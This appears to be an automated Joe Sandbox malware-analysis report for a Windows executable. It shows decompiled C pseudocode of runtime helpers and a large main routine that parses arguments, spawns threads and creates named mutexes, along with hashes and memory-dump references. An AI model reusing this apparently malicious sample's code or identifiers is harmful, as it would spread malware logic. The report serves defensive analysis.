Opcode ID: 4178e562c376d4a3b0b76883790a2e0249baa430d02443787650f1c5e1b85707
Instruction ID: 029af83db993e60e02adbe80eeb3680e1880607eb6cf05d315d9db5a8a2357e2
Opcode Fuzzy Hash: 4178e562c376d4a3b0b76883790a2e0249baa430d02443787650f1c5e1b85707
Instruction Fuzzy Hash: 33E08C7CA00208EFCB10CFA4DA44A9DBBB0FB4D320F1083C5ED48A73A0D6319A90CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2F1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040B2F1(void* __edx, void* __eflags) {
				intOrPtr* _t26;
				void* _t29;
				intOrPtr _t31;
				intOrPtr* _t35;
				void* _t37;

				_t29 = __edx;
				E0040D238(E00425928, _t37);
				_push("vector<T> too long");
				E0040B258(_t37 - 0x2c);
				 *(_t37 - 4) =  *(_t37 - 4) & 0x00000000;
				_t26 = _t37 - 0x58;
				E0040B20D(_t26, _t37 - 0x2c);
				E0040C5F0(_t37 - 0x58, 0x4270ac);
				asm("int3");
				E0040D238(E004258EB, _t37);
				_push(_t26);
				_t31 =  *((intOrPtr*)(_t37 + 8));
				_t35 = _t26;
				 *((intOrPtr*)(_t37 - 0x10)) = _t35;
				E0040C050(_t26, _t31);
				 *(_t37 - 4) =  *(_t37 - 4) & 0x00000000;
				_push(_t31 + 0xc);
				 *_t35 = 0x401f88;
				E0040AFE7(_t35 + 0xc, _t29);
				 *[fs:0x0] =  *((intOrPtr*)(_t37 - 0xc));
				return _t35;
			}

0x0040b2f1
0x0040b2f6
0x0040b2fe
0x0040b306
0x0040b30b
0x0040b313
0x0040b316
0x0040b324
0x0040b329
0x0040b32f
0x0040b334
0x0040b337
0x0040b33a
0x0040b33d
0x0040b340
0x0040b345
0x0040b34c
0x0040b350
0x0040b356
0x0040b362
0x0040b36a

APIs

__EH_prolog.LIBCMT ref: 0040B2F6

Part of subcall function 0040B258: __EH_prolog.LIBCMT ref: 0040B25D

std::bad_exception::bad_exception.LIBCMT ref: 0040B316
__CxxThrowException@8.LIBCMTD ref: 0040B324

Part of subcall function 0040C5F0: RaiseException.KERNEL32(?,?,0040CDA7,00000000,?,0040A35E,?,?,?,?,0040CDA7), ref: 0040C63C

Strings

vector<T> too long, xrefs: 0040B2FE

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3284712508-3788999226
Opcode ID: 468f777b8ae386a726e97b845a0e1b2aca878390a778a802a44a73b6906eefbd
Instruction ID: 1c569d510215b6815d69a235e67497be5f445cdef44d192648baae161b5bbf28
Opcode Fuzzy Hash: 468f777b8ae386a726e97b845a0e1b2aca878390a778a802a44a73b6906eefbd
Instruction Fuzzy Hash: E8D01271D0120896C704F7E5D85AECD77789B14314F50817FF210B50C2DB7C560DC6A9

Uniqueness

Uniqueness Score: -1.00%

Function 00411FAA Relevance: 6.0, APIs: 4, Instructions: 32
threadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00411FAA(intOrPtr __eax) {
				void* _t10;
				intOrPtr _t11;
				intOrPtr _t16;
				void* _t21;

				 *((intOrPtr*)(_t21 - 8)) = __eax;
				if( *((intOrPtr*)(_t21 - 8)) == 0) {
					L2:
					E00412010();
					_t10 = 0;
				} else {
					_push( *((intOrPtr*)(_t21 - 8)));
					_t11 =  *0x4bb7a4; // 0x1
					_push(_t11);
					_t16 =  *0x4e3690; // 0xfb6ef88e
					if( *((intOrPtr*)(E00411D00(_t16)))() != 0) {
						E00412070(_t16,  *((intOrPtr*)(_t21 - 8)), 0);
						 *((intOrPtr*)( *((intOrPtr*)(_t21 - 8)))) = GetCurrentThreadId();
						 *((intOrPtr*)( *((intOrPtr*)(_t21 - 8)) + 4)) = 0xffffffff;
						_t10 = 1;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x00411fad
0x00411fb4
0x00411fd5
0x00411fd5
0x00411fda
0x00411fb6
0x00411fb9
0x00411fba
0x00411fbf
0x00411fc0
0x00411fd3
0x00411fe4
0x00411ff5
0x00411ffa
0x00412001
0x00000000
0x00000000
0x00000000
0x00411fd3
0x00412009

APIs

__encode_pointer.LIBCMTD ref: 00411FC7

Part of subcall function 00411D00: TlsGetValue.KERNEL32(00000001,00411F76,F76EF88E), ref: 00411D15
Part of subcall function 00411D00: TlsGetValue.KERNEL32(00000001,00000001), ref: 00411D36
Part of subcall function 00411D00: __crt_wait_module_handle.LIBCMTD ref: 00411D4C
Part of subcall function 00411D00: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00411D66

__mtterm.LIBCMTD ref: 00411FD5
__initptd.LIBCMTD ref: 00411FE4
GetCurrentThreadId.KERNEL32 ref: 00411FEC

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: Value$AddressCurrentProcThread__crt_wait_module_handle__encode_pointer__initptd__mtterm
String ID:
API String ID: 1673568325-0
Opcode ID: ccf8397e6f196f5e7fe20a4a08fc6cafe1d0d1186342f7071d9757fdecae65b2
Instruction ID: 47a0f6293b4b5b65e7c08fe077c84a858b518ccdabdcfcd805c4da1b9be5d874
Opcode Fuzzy Hash: ccf8397e6f196f5e7fe20a4a08fc6cafe1d0d1186342f7071d9757fdecae65b2
Instruction Fuzzy Hash: 69F0B4B4A00105AFCB10DFB4DC4579EBB71EB48318F1043A9EA09D73A1EB76D591C795

Uniqueness

Uniqueness Score: -1.00%

Function 00408E75 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E75(signed int** __ecx) {
				void* _t3;
				signed int _t5;
				signed int _t6;
				signed int* _t8;
				signed int* _t9;

				_t8 = __ecx;
				_t9 =  *__ecx;
				if(_t9 != 0 &&  *_t9 != 0xfffffffd) {
					if( *_t9 == 0) {
						L6:
						E0040BB90(L"ITERATOR LIST CORRUPTED!", L"C:\\Program Files (x86)\\Microsoft Visual Studio 9.0\\VC\\include\\xutility", 0xbd);
						L7:
						_t5 = _t8[1];
						 *_t9 = _t5;
						 *_t8 =  *_t8 & 0x00000000;
						return _t5;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t6 =  *_t9;
						if(_t6 == _t8) {
							break;
						}
						_t1 = _t6 + 4; // 0x4
						_t9 = _t1;
						if( *_t9 != 0) {
							continue;
						}
						break;
					}
					if( *_t9 != 0) {
						goto L7;
					}
					goto L6;
				}
				return _t3;
			}

0x00408e77
0x00408e79
0x00408e7d
0x00408e87
0x00408e9c
0x00408eab
0x00408eb3
0x00408eb3
0x00408eb6
0x00408eb8
0x00000000
0x00000000
0x00000000
0x00000000
0x00408e89
0x00408e89
0x00408e89
0x00408e8d
0x00000000
0x00000000
0x00408e8f
0x00408e8f
0x00408e95
0x00000000
0x00000000
0x00000000
0x00408e95
0x00408e9a
0x00000000
0x00000000
0x00000000
0x00408e9a
0x00408ebd

APIs

std::_Debug_message.LIBCPMTD ref: 00408EAB

Strings

ITERATOR LIST CORRUPTED!, xrefs: 00408EA6
C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\xutility, xrefs: 00408EA1

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: Debug_messagestd::_
String ID: C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\xutility$ITERATOR LIST CORRUPTED!
API String ID: 3726000766-642944367
Opcode ID: 1afba2dfde5b2eecce0e571c007e9044ecf7ddbc02385a553b9c8c950a0be2c6
Instruction ID: 558bd7eada2d7bb1a014c5c22a2e1d7da66fe65cc924f5b17778a248566748c4
Opcode Fuzzy Hash: 1afba2dfde5b2eecce0e571c007e9044ecf7ddbc02385a553b9c8c950a0be2c6
Instruction Fuzzy Hash: 9AF0F8319002229BD7305E08D901B56B7E0AB80721F39063FE9C4B62D0EBB85CC1CACD

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2BF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

__CrtCheckMemory.LIBCMTD ref: 0040F2CF

Strings

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040F2E4
_CrtCheckMemory(), xrefs: 0040F2D8

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: CheckMemory
String ID: _CrtCheckMemory()$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
API String ID: 2067751306-2660621803
Opcode ID: 0bf59c5a0b35425591cffaccd1c92df293b95e3c7fda13f26c874328d905f4b0
Instruction ID: e68109cb94975dc00960fd0ca6fbaed2c3fa71bbc438d0f02ef74e1e2c8e49fc
Opcode Fuzzy Hash: 0bf59c5a0b35425591cffaccd1c92df293b95e3c7fda13f26c874328d905f4b0
Instruction Fuzzy Hash: D9F0E5305402459ADA319F24ED8FF263210B75030AF24817BF9047AAC2D2B99A4C8E5F

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Q5W0I0pzFI.exePID: 6496, Parent PID: 6988COMMON

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	38%
Total number of Nodes:	753
Total number of Limit Nodes:	17

Executed Functions

Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00419F90(void* __ebx, void* __edi, intOrPtr _a4, int _a8, int _a12, int _a16, signed int _a20, WCHAR** _a24, void* _a28, signed int _a32, intOrPtr _a36, long _a40, int _a44, int _a52, int _a56, intOrPtr _a72, intOrPtr _a80, char _a84, WCHAR* _a88, char _a96, intOrPtr _a100, struct tagMSG _a104, int _a108, char _a116, WCHAR* _a124, char _a128, char _a132, int _a144, int _a148, char _a156, char _a160, int _a176, int _a180, char _a196, char _a200, char _a204, int _a216, int _a220, char _a228, char _a232, int _a244, int _a248, char _a252, char _a260, char _a264, struct tagMSG _a272, struct tagMSG _a276, int _a280, int _a284, intOrPtr _a288, int _a292, char _a300, char _a304, char _a320, int _a336, int _a340, char _a380, short _a388, struct _SHELLEXECUTEINFOW _a396, int _a400, WCHAR* _a408, char* _a412, WCHAR* _a416, intOrPtr _a420, intOrPtr _a424, void* _a892, char _a896, short _a968, char _a984, char _a3248, short _a3252) {
				intOrPtr _v0;
				int _v4;
				long _v8;
				WCHAR** _v12;
				short* _v16;
				int _v20;
				CHAR* _v24;
				int _v28;
				int _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				void* __esi;
				void* _t525;
				void* _t526;
				void* _t528;
				int _t530;
				void* _t534;
				void* _t535;
				void* _t536;
				void* _t556;
				int _t557;
				WCHAR** _t566;
				void* _t570;
				void* _t573;
				int _t581;
				void* _t585;
				void* _t588;
				intOrPtr* _t590;
				int _t592;
				void* _t594;
				CHAR* _t596;
				void* _t599;
				void* _t602;
				void* _t608;
				void* _t614;
				int* _t618;
				short* _t677;
				void* _t697;
				void* _t707;
				void* _t723;
				void* _t727;
				long _t728;
				long _t729;
				void* _t730;
				void* _t746;
				long _t747;
				void* _t751;
				void* _t754;
				long _t755;
				void* _t759;
				void* _t765;
				signed int _t770;
				void* _t773;
				void* _t780;
				void* _t782;
				void* _t784;
				void* _t788;
				signed int _t789;
				void* _t790;
				void* _t799;
				void* _t800;
				void* _t817;
				void* _t828;
				void* _t839;
				short* _t846;
				void* _t856;
				void* _t859;
				char* _t861;
				void* _t865;
				long _t868;
				intOrPtr* _t879;
				void* _t881;
				void* _t895;
				void* _t896;
				void* _t897;
				void* _t898;
				void* _t899;
				void* _t901;
				void* _t903;
				long _t916;
				signed int _t917;
				void* _t919;
				WCHAR** _t923;
				WCHAR** _t949;
				WCHAR* _t950;
				void* _t952;
				int* _t955;
				int* _t958;
				int* _t960;
				intOrPtr _t962;
				int _t966;
				WCHAR** _t968;
				void* _t969;
				void* _t974;
				intOrPtr* _t982;
				void* _t983;
				intOrPtr* _t986;
				void* _t987;
				WCHAR* _t989;
				signed int _t990;
				signed int _t991;
				WCHAR* _t995;
				signed int _t996;
				signed int _t997;
				WCHAR* _t1000;
				signed int _t1001;
				signed int _t1002;
				intOrPtr* _t1005;
				void* _t1006;
				char* _t1008;
				intOrPtr* _t1011;
				void* _t1012;
				char* _t1014;
				intOrPtr* _t1017;
				void* _t1018;
				char* _t1020;
				intOrPtr* _t1136;
				void* _t1137;
				short* _t1142;
				void* _t1145;
				intOrPtr _t1159;
				intOrPtr _t1161;
				intOrPtr* _t1164;
				intOrPtr* _t1167;
				short* _t1168;
				short* _t1171;
				short* _t1173;
				intOrPtr* _t1175;
				intOrPtr* _t1178;
				intOrPtr* _t1181;
				intOrPtr* _t1191;
				int _t1197;
				int _t1198;
				WCHAR* _t1199;
				short* _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1204;
				short* _t1205;
				signed int _t1206;
				int* _t1207;
				signed int _t1208;
				int* _t1209;
				signed int _t1210;
				int* _t1211;
				intOrPtr* _t1212;
				unsigned int _t1215;
				signed int _t1217;
				void* _t1220;
				int* _t1226;
				void* _t1227;
				int _t1230;
				short* _t1231;
				int _t1232;
				int _t1233;
				int _t1234;
				int _t1235;
				char _t1236;
				int _t1242;
				signed int _t1244;
				short* _t1245;
				long _t1248;
				void* _t1249;
				signed int _t1263;
				signed int _t1264;
				void* _t1266;
				void* _t1268;
				void* _t1269;
				short* _t1270;
				void* _t1271;
				short* _t1272;
				void* _t1273;
				void* _t1274;
				char* _t1275;
				void* _t1276;
				void* _t1277;
				char* _t1278;
				void* _t1279;
				void* _t1280;
				char* _t1281;
				void* _t1282;
				void* _t1283;
				void* _t1284;
				void* _t1285;
				void* _t1286;
				void* _t1290;
				void* _t1292;
				short* _t1294;

				_t1264 = _t1263 & 0xfffffff8;
				E0042F7C0(0x14c4);
				_push(__ebx);
				_push(__edi);
				 *0x513244 = _a4; // executed
				_t525 = E0040CF10(); // executed
				if(_t525 == 0) {
					_t526 = GetCurrentProcess();
					GetLastError();
					_t528 = SetPriorityClass(_t526, 0x80); // executed
					__eflags = _t528;
					if(__eflags == 0) {
						GetLastError();
					}
					_t1226 =  *0x529228; // 0x5cd750
					_a52 = 0;
					_a56 = 0;
					_t530 = E0041D3C0(__eflags, _t1226, _t1226[1],  &_a52);
					_t1159 =  *0x52922c; // 0x0
					_t974 = 0xffffffe - _t1159;
					_t1197 = _t530;
					__eflags = _t974 - 1;
					if(__eflags < 0) {
						_push("list<T> too long");
						E0044F23E(__eflags);
						goto L213;
					} else {
						 *0x52922c = _t1159 + 1;
						_t1226[1] = _t1197;
						 *( *(_t1197 + 4)) = _t1197;
						_t556 = E00419D10( &_a984);
						_t1226 =  *0x513268;
						_t557 = E0041D340(__eflags, _t1226, _t1226[1], _t556);
						_t1161 =  *0x51326c;
						_t974 = 0x1cb189 - _t1161;
						_t1198 = _t557;
						__eflags = _t974 - 1;
						if(__eflags < 0) {
							L213:
							_push("list<T> too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t1226);
							_t1227 = _t974;
							__eflags =  *(_t1227 + 0x8dc) - 0x10;
							if( *(_t1227 + 0x8dc) >= 0x10) {
								L00422587( *((intOrPtr*)(_t1227 + 0x8c8)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x8dc) = 0xf;
							 *(_t1227 + 0x8d8) = 0;
							 *((char*)(_t1227 + 0x8c8)) = 0;
							__eflags =  *(_t1227 + 0x8b8) - 8;
							if( *(_t1227 + 0x8b8) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x8a4)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x8b8) = 7;
							 *(_t1227 + 0x8b4) = 0;
							 *((short*)(_t1227 + 0x8a4)) = 0;
							_t534 =  *(_t1227 + 0x898);
							__eflags = _t534;
							if(_t534 != 0) {
								E00414F10(_t534,  *(_t1227 + 0x89c));
								L00422587( *(_t1227 + 0x898));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x898) = 0;
								 *(_t1227 + 0x89c) = 0;
								 *(_t1227 + 0x8a0) = 0;
							}
							_t535 =  *(_t1227 + 0x88c);
							__eflags = _t535;
							if(_t535 != 0) {
								E00414F10(_t535,  *(_t1227 + 0x890));
								L00422587( *(_t1227 + 0x88c));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x88c) = 0;
								 *(_t1227 + 0x890) = 0;
								 *(_t1227 + 0x894) = 0;
							}
							_t536 =  *(_t1227 + 0x880);
							__eflags = _t536;
							if(_t536 != 0) {
								E00414F10(_t536,  *(_t1227 + 0x884));
								L00422587( *(_t1227 + 0x880));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x880) = 0;
								 *(_t1227 + 0x884) = 0;
								 *(_t1227 + 0x888) = 0;
							}
							__eflags =  *(_t1227 + 0x87c) - 8;
							if( *(_t1227 + 0x87c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x868)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x87c) = 7;
							 *(_t1227 + 0x878) = 0;
							 *((short*)(_t1227 + 0x868)) = 0;
							__eflags =  *(_t1227 + 0x864) - 8;
							if( *(_t1227 + 0x864) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x850)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x864) = 7;
							 *(_t1227 + 0x860) = 0;
							 *((short*)(_t1227 + 0x850)) = 0;
							__eflags =  *(_t1227 + 0x84c) - 8;
							if( *(_t1227 + 0x84c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x838)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x84c) = 7;
							 *(_t1227 + 0x848) = 0;
							 *((short*)(_t1227 + 0x838)) = 0;
							__eflags =  *(_t1227 + 0x834) - 8;
							if( *(_t1227 + 0x834) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x820)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x834) = 7;
							 *(_t1227 + 0x830) = 0;
							 *((short*)(_t1227 + 0x820)) = 0;
							__eflags =  *(_t1227 + 0x1c) - 8;
							if( *(_t1227 + 0x1c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 8)));
							}
							 *(_t1227 + 0x1c) = 7;
							__eflags = 0;
							 *(_t1227 + 0x18) = 0;
							 *((short*)(_t1227 + 8)) = 0;
							return 0;
						} else {
							 *0x51326c = _t1161 + 1;
							_t1226[1] = _t1198;
							 *( *(_t1198 + 4)) = _t1198;
							L214();
							_a32 = 0;
							_a44 = 0;
							_t1230 =  *( *0x513268);
							_v4 = _t1230;
							_a52 = _t1230;
							E00413A90(0,  &_a128, _t1198, 0x400);
							_t1199 = _a124;
							GetModuleFileNameW(0, _t1199, 0x400);
							PathRemoveFileSpecW(_t1199);
							_push(_a72);
							_a180 = 7;
							_a176 = 0;
							_a160 = 0;
							E00418400( &_a160, _t1199, _a128);
							_t1200 = _t1230 + 0x10;
							__eflags = _t1200 -  &_a148;
							if(_t1200 !=  &_a148) {
								__eflags =  *(_t1200 + 0x14) - 8;
								if( *(_t1200 + 0x14) >= 8) {
									L00422587( *_t1200);
									_t1264 = _t1264 + 4;
								}
								__eflags = 0;
								 *(_t1200 + 0x14) = 7;
								 *(_t1200 + 0x10) = 0;
								 *_t1200 = 0;
								E004145A0(_t1200,  &_a160);
							}
							__eflags = _a180 - 8;
							if(_a180 >= 8) {
								L00422587(_a160);
								_t1264 = _t1264 + 4;
							}
							_a44 = 0;
							_t566 = CommandLineToArgvW(GetCommandLineW(),  &_a44);
							_a28 = _t566;
							lstrcpyW( &_a3252,  *_t566);
							_t1201 = 1;
							__eflags = _a36 - 1;
							if(_a36 <= 1) {
								L26:
								GlobalFree(_a28);
								__eflags =  *0x513235;
								if( *0x513235 == 0) {
									_t570 = E00412220(); // executed
									__eflags = _t570 - 1;
								} else {
									__eflags = E00412220() - 2;
								}
								if(__eflags <= 0) {
									E0040EF50(0x50fec0,  &_v12, __eflags, 0xa);
									_t949 = _v12;
									_t1266 = _t1264 + 4;
									_a148 = 0xf;
									_t1202 = 0;
									__eflags = 0;
									_a144 = 0;
									_a128 = 0;
									do {
										_t1164 =  *((intOrPtr*)(_t949 + _t1202 * 4));
										__eflags =  *_t1164;
										if( *_t1164 != 0) {
											_t982 = _t1164;
											_v12 = _t982 + 1;
											do {
												_t573 =  *_t982;
												_t982 = _t982 + 1;
												__eflags = _t573;
											} while (_t573 != 0);
											_t983 = _t982 - _v12;
											__eflags = _t983;
										} else {
											_t983 = 0;
										}
										_push(_t983);
										E00413EA0(_t949,  &_a128, _t1202, _t1230, _t1164);
										_t1202 = _t1202 + 1;
										__eflags = _t1202 - 0xa;
									} while (_t1202 < 0xa);
									__eflags = _a144 - 0x10;
									_t576 =  >=  ? _a124 :  &_a124;
									_push( >=  ? _a124 :  &_a124);
									 *(_t1230 + 0x8cc) = E00423C24();
									_a220 = 7;
									_a200 = 0;
									_a288 = 0;
									_a272.hwnd = 0;
									_a216 = 0;
									_a292 = 7;
									E00411CD0(_t949,  &_a272,  &_a200); // executed
									_t581 = _a16;
									_t1268 = _t1266 + 8;
									_t950 = _a28;
									__eflags = _t581;
									if(_t581 != 0) {
										L59:
										 *(_t1230 + 0x8cc) = 0;
									} else {
										__eflags = _t950;
										if(_t950 != 0) {
											goto L59;
										} else {
											_a12 = 7;
											_push(0xffffffff);
											_v8 = 0;
											_a8 = 0;
											E00414690(_t950,  &_v8,  &_a200, 0);
											_t1294 = _t1268 - 0x18;
											_t1142 = _t1294;
											_push(0xffffffff);
											 *(_t1142 + 0x14) = 7;
											 *(_t1142 + 0x10) = 0;
											 *_t1142 = 0;
											E00414690(_t950, _t1142,  &_v20, 0);
											E0040D240( *(_t1230 + 0x8cc)); // executed
											_t1268 = _t1294 + 0x18;
											__eflags = _v12 - 8;
											if(_v12 >= 8) {
												L00422587(_v16);
												_t1268 = _t1268 + 4;
											}
											_t581 = _a8;
										}
									}
									__eflags =  *0x513235;
									if( *0x513235 != 0) {
										L60:
										E00411A10();
										goto L61;
									} else {
										__eflags = _t581;
										if(_t581 != 0) {
											L62:
											__eflags =  *0x513234;
											if(__eflags != 0) {
												goto L81;
											} else {
												__eflags = _t581;
												if(__eflags == 0) {
													__eflags = _t950;
													if(__eflags == 0) {
														E0040EF50(0x50ffe0,  &_v16, __eflags, 0x10);
														_t1245 = _v16;
														_t1268 = _t1268 + 4;
														_a108 = 0xf;
														_t1217 = 0;
														__eflags = 0;
														_a104.hwnd = 0;
														_a88 = _t950;
														do {
															_t1191 =  *((intOrPtr*)(_t1245 + _t1217 * 4));
															__eflags =  *_t1191;
															if( *_t1191 != 0) {
																_t1136 = _t1191;
																_t950 = _t1136 + 1;
																do {
																	_t859 =  *_t1136;
																	_t1136 = _t1136 + 1;
																	__eflags = _t859;
																} while (_t859 != 0);
																_t1137 = _t1136 - _t950;
																__eflags = _t1137;
															} else {
																_t1137 = 0;
															}
															_push(_t1137);
															E00413EA0(_t950,  &_a88, _t1217, _t1245, _t1191);
															_t1217 = _t1217 + 1;
															__eflags = _t1217 - 0x10;
														} while (_t1217 < 0x10);
														_t861 =  &_a84;
														_t1140 =  &(_v24[0x8d0]);
														__eflags =  &(_v24[0x8d0]) - _t861;
														if( &(_v24[0x8d0]) != _t861) {
															_push(0xffffffff);
															E00413FF0(_t950, _t1140, _t861, 0);
														}
														_t865 = CreateThread(0, 0x61a8000, E0041DBD0, ( *0x513268)[1] + 8, 0, 0x513258);
														__eflags = _a100 - 0x10;
														 *0x513254 = _t865;
														if(__eflags >= 0) {
															L00422587(_a80);
															_t1268 = _t1268 + 4;
														}
													}
												}
												E0040EF50(0x50fe90,  &_v16, __eflags, 0xa);
												_t1292 = _t1268 + 4;
												_t1244 = 0;
												__eflags = 0;
												do {
													_t846 = _v16;
													_a20 =  *(_t846 + _t1244 * 4);
													_t1215 = 2 + lstrlenA( *(_t846 + _t1244 * 4)) * 2;
													_t950 = E00420C62(_t950,  &_v16, _t1215, _t1215);
													E0042B420(_t950, 0, _t1215);
													_t1292 = _t1292 + 0x10;
													MultiByteToWideChar(0, 0, _a20, 0xffffffff, _t950, _t1215 >> 1);
													lstrcatW(0x513290, _t950);
													_t1244 = _t1244 + 1;
													__eflags = _t1244 - 0xa;
												} while (_t1244 < 0xa);
												__eflags = lstrlenW(0x51a7c0);
												if(__eflags <= 0) {
													E0040E760(0x513278, __eflags);
													 *0x529225 = _a16;
													 *0x529226 = _a28;
													_t856 = CreateThread(0, 0x61a8000, E0041E690, 0x513270, 0, 0x51325c);
													 *0x513260 = _t856;
													WaitForSingleObject(_t856, 0xffffffff);
												}
												 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
											}
											goto L82;
										} else {
											__eflags = _t950;
											if(_t950 != 0) {
												goto L62;
											} else {
												__eflags =  *0x513234 - _t950;
												if(__eflags != 0) {
													L81:
													 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
													L82:
													E0040EF50(0x50ff80,  &_v16, __eflags, 0xa);
													_t1231 = _v16;
													_t1269 = _t1268 + 4;
													_a340 = 0xf;
													_t1204 = 0;
													__eflags = 0;
													_a336 = 0;
													_a320 = 0;
													do {
														_t1167 =  *((intOrPtr*)(_t1231 + _t1204 * 4));
														__eflags =  *_t1167;
														if( *_t1167 != 0) {
															_t986 = _t1167;
															_t950 = _t986 + 1;
															do {
																_t585 =  *_t986;
																_t986 = _t986 + 1;
																__eflags = _t585;
															} while (_t585 != 0);
															_t987 = _t986 - _t950;
															__eflags = _t987;
														} else {
															_t987 = 0;
														}
														_push(_t987);
														E00413EA0(_t950,  &_a320, _t1204, _t1231, _t1167);
														_t1204 = _t1204 + 1;
														__eflags = _t1204 - 0xa;
													} while (_t1204 < 0xa);
													_t1270 = _t1269 - 0x18;
													_v20 = 0;
													_t1168 = _t1270;
													_t1205 =  &_v20;
													 *(_t1168 + 0x14) = 7;
													 *(_t1168 + 0x10) = 0;
													 *_t1168 = 0;
													__eflags =  *0x51a7c0;
													if( *0x51a7c0 != 0) {
														_t989 = 0x51a7c0;
														_t201 =  &(_t989[1]); // 0x51a7c2
														_t1231 = _t201;
														do {
															_t588 =  *_t989;
															_t989 =  &(_t989[1]);
															__eflags = _t588;
														} while (_t588 != 0);
														_t990 = _t989 - _t1231;
														__eflags = _t990;
														_t991 = _t990 >> 1;
													} else {
														_t991 = 0;
													}
													_push(_t991);
													E00415C10(0, _t1168, _t1205, _t1231, 0x51a7c0);
